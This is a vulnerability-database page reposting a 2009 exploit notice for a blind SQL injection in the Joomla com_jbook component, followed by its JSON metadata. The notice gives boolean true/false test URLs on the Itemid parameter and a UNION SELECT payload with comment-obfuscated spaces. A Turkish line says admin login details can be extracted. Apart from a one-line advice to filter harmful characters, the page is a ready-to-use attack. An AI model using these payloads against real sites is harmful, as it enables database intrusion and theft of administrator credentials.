Search...

Joomla! Component com_jbook - Blind SQL Injection

2009-12-18T00:00:00

ID EXPLOITPACK:7FDC724D2BE55B1EB8A18FA00971C1A9
Type exploitpack
Reporter FL0RiX
Modified 2009-12-18T00:00:00

Description

Joomla! Component com_jbook - Blind SQL Injection

                                        
                                            #############################################################
#        Joomla Component com_jbook Blind SQL-injection Vulnerability                                      #
#############################################################

# author        : Fl0riX 
# Greetz    : BARCOD3 , Septemb0x, Deep-Power,DreamPower,Pyske,F0rtys3v3n,BlackApple
# Name         : com_jbook

# Bug Type    : Blind SQL Injection

# Infection     : Admin login bilgileri al&#65533;nabilir.

# Demo Vuln.  :
TRUE(+)
&#65533; http:/server/index.php?option=com_jbook&Itemid=90 and 1=1
FALSE(-)
&#65533; http://server/index.php?option=com_jbook&Itemid=90 and 1=0

# Bug Fix Advice : Zararl&#65533; karakterler filtrelenmelidir.

# Greez : KinqSqlZ Crew
#############################################################

&lt; ------------------- header data end of ------------------- &gt;

&lt; -- bug code start -- &gt;

path/index.php?option=com_jbook&Itemid=null/**/and/**/1=0/**/union/**/select/**/0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--

&lt; -- bug code end of -- &gt;

JSON Vulners Source

Initial Source

{"lastseen": "2020-04-01T19:04:23", "references": [], "description": "\nJoomla! Component com_jbook - Blind SQL Injection", "edition": 1, "reporter": "FL0RiX", "exploitpack": {"type": "webapps", "platform": "php"}, "published": "2009-12-18T00:00:00", "title": "Joomla! Component com_jbook - Blind SQL Injection", "type": "exploitpack", "enchantments": {"dependencies": {"references": [], "modified": "2020-04-01T19:04:23", "rev": 2}, "score": {"value": 0.1, "vector": "NONE", "modified": "2020-04-01T19:04:23", "rev": 2}, "vulnersScore": 0.1}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2009-12-18T00:00:00", "id": "EXPLOITPACK:7FDC724D2BE55B1EB8A18FA00971C1A9", "href": "", "viewCount": 2, "sourceData": "#############################################################\n# Joomla Component com_jbook Blind SQL-injection Vulnerability #\n#############################################################\n\n# author : Fl0riX \n# Greetz : BARCOD3 , Septemb0x, Deep-Power,DreamPower,Pyske,F0rtys3v3n,BlackApple\n# Name : com_jbook\n\n# Bug Type : Blind SQL Injection\n\n# Infection : Admin login bilgileri al�nabilir.\n\n# Demo Vuln. :\nTRUE(+)\n� http:/server/index.php?option=com_jbook&Itemid=90 and 1=1\nFALSE(-)\n� http://server/index.php?option=com_jbook&Itemid=90 and 1=0\n\n# Bug Fix Advice : Zararl� karakterler filtrelenmelidir.\n\n# Greez : KinqSqlZ Crew\n#############################################################\n\n< ------------------- header data end of ------------------- >\n\n< -- bug code start -- >\n\npath/index.php?option=com_jbook&Itemid=null/**/and/**/1=0/**/union/**/select/**/0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--\n\n< -- bug code end of -- >", "cvss": {"score": 0.0, "vector": "NONE"}}